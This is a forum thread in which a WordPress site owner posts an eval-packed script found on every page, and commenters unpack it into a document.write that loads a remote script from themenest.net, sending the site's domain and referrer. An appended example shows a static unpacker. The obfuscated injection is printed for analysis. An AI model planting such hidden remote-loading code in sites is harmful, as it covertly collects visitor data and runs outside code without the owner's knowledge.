What does this code do on my WordPress Blog? Malware?

I found the following code loading every time the site loads. Please tell me what function it performs on my blog.

themenest.net is the URL I see when my site is loading.

<script type="text/javascript">
    eval(function (p, a, c, k, e, r) {
        e = function (c) {
            return c.toString(a)
        };
        if (!''.replace(/^/, String)) {
            while (c--) r[e(c)] = k[c] || e(c);
            k = [function (e) {
                    return r[e]
                }
            ];
            e = function () {
                return '\\w+'
            };
            c = 1
        };
        while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
        return p
    }('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');', 25, 25, 'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'), 0, {}));
</script>

Does anyone know?


4 comments

  1. If you unpack it, the code is:

    document.write('<scr' + 'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d=' + document.domain + '&r=' + encodeURIComponent(document.referrer) + '&c=' + Math.floor((Math.random() * 1000) + 1) + '"></scr' + 'ipt>');
    

    …which retrieves a script resource from http://themenest.net/platform/script/track passing in information about the document it’s in and the referring link that brought you to that document. I don’t know what that script resource might be (it might be nothing, the point could just be tracking; look in the Network tab of your browser to see what comes back).

    Whether it’s some kind of malware depends on your relationship with themenest.net. 🙂

  2. That code injects this script element:

    <script type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></script>
    

    It’s a tracker, most likely from themenest (the place where you originally got the theme), which detects the usage of their themes across users. This is most likely an analytics script for them.

    The script gets:

    • your domain name (the current page domain, the website using the theme)
    • the referrer (where you were before arriving at a page of that site containing that script)
    • and uses a cache busting mechanism to load the latest version of the script every time

  3. It looks like this is for referral and/or logging referrer domains, as you can see there:

    track|domain|r|encodeURIComponent|referrer
    

    You would need to unpack it to see the real source.

    Just unpacked it, there you go:

    <script type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></script>
    

    As I wrote above, it just logs your domain to the themenest.net servers.

    I guess to find out copyright abuses.

  4. This has something to do with referrals, tracking and domains. It is packed, so the exact code can’t be read. Only if you unpack it:

    eval document.write('<scr'+'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></scr'+'ipt>');
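
Added example, not part of the original question or comments: a static unpacker that applies the packer's token substitution to the question's payload as data, without calling `eval`, and then lists the hosts the unpacked code would contact. The function names `unpack` and `remoteHosts` are hypothetical, and only the radix 36 or lower token encoding (the question uses radix 25) is handled.

```javascript
// Statically unpack a Dean Edwards "p,a,c,k,e,r" payload without eval().
// Assumption: radix <= 36, where each token is simply index.toString(radix).
function unpack(payload, radix, count, keywords) {
  if (radix > 36) {
    throw new RangeError('radix > 36 uses a different token encoding');
  }
  const dict = new Map();
  for (let i = 0; i < count; i++) {
    const token = i.toString(radix);
    // An empty keyword slot means the token stands for itself.
    dict.set(token, keywords[i] || token);
  }
  // Single pass over every word-like token, as the packer's own decoder does.
  return payload.replace(/\b\w+\b/g, (t) => (dict.has(t) ? dict.get(t) : t));
}

// List the distinct hosts of absolute URLs found in the unpacked source.
function remoteHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    hosts.add(m[1].toLowerCase());
  }
  return [...hosts];
}

// Arguments copied from the packed call in the question (treated as strings only).
const PAYLOAD = "0.f('<2'+'3 5=\"6/7\" 8=\"9://a.b/e/o/g?d='+0.h+'&i='+j(0.k)" +
  "+'&c='+4.l((4.m()*n)+1)+'\"></2'+'3>');";
const KEYWORDS = ('document||scr|ipt|Math|type|text|javascript|src|http|themenest|' +
  'net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|' +
  'random|1000|script').split('|');

const unpacked = unpack(PAYLOAD, 25, 25, KEYWORDS);
console.log(unpacked);              // the document.write(...) call shown in the comments
console.log(remoteHosts(unpacked)); // hosts to look for in the browser's Network tab
```
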